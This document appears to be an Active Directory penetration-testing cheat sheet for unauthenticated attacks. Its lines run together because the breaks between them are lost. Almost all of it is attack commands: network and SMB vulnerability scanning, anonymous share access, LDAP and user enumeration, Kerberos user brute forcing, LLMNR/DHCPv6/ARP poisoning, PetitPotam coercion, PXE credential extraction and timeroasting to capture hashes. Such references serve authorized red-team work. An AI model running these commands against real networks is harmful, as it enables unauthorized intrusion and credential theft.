Scan network Vulnerable host
nxc smb <ip_range>nmap -sP -p <ip>nmap -Pn -sV --top-ports 50 --open <ip>nmap -Pn --script smb-vuln* -p139,445 <ip>nmap -Pn -sC -sV -oA <output> <ip>nmap -Pn -sC -sV -p- -oA <output> <ip>nmap -sU -sC -sV -oA <output> <ip>
Find DC IP
nmcli dev show <interface>nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>nmap -p 88 --open <ip_range>
Zone transfer
dig axfr <domain_name> @<name_server>
Anonymous & Guest access on SMB shares
nxc smb <ip_range> -u '' -p ''nxc smb <ip_range> -u 'a' -p ''enum4linux-ng.py -a -u '' -p '' <ip>smbclient -U '%' -L //<ip>
Enumerate LDAP Username
nmap -n -sV --script 'ldap*' and not brute -p 389 <dc_ip>ldapsearch -x -H <dc_ip> -s base
Enumerate Users Username
nxc smb <dc_ip> --usersnxc smb <dc_ip> --rid-brute 10000 # bruteforcing RIDnet rpc group members 'Domain Users' -W '<domain> -l <ip> -U '%'
Bruteforce users Username
kerbrute userenum -d <domain> <userlist>nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm= '<domain>',userdb=<user_list_file>" <dc_ip>
Poisoning poisoning SMB || poisoning LDAP || poisoning HTTP
- LLMNR / NBTNS / MDNS
responder -l <interface>
- ⚠️ DHCPv6 (IPv6 prefered to IPv4)
mitm6 -d <domain>bettercap
- ⚠️ ARP Poisoning
bettercapasreqroastPcredz -i <interface> -vHash found ASREQ
Coerce Coerce SMB
- Unauthenticated PetitPotam (CVE-2022-26925) @CVE@
petitpotam.py -d <domain> <listener> <target>
PXE
- no password Credentials (NAA account)
pxethief.py 1pxethief.py 2 <distribution_point_ip>
- password protected PXE Hash
tftp -i <dp_ip> GET "\xxx\boot.var"pxethief.py 5 '\xxx\boot.var'
TimeRoasting timeroast hash
timeroast.py <dc_ip> -o <output_log>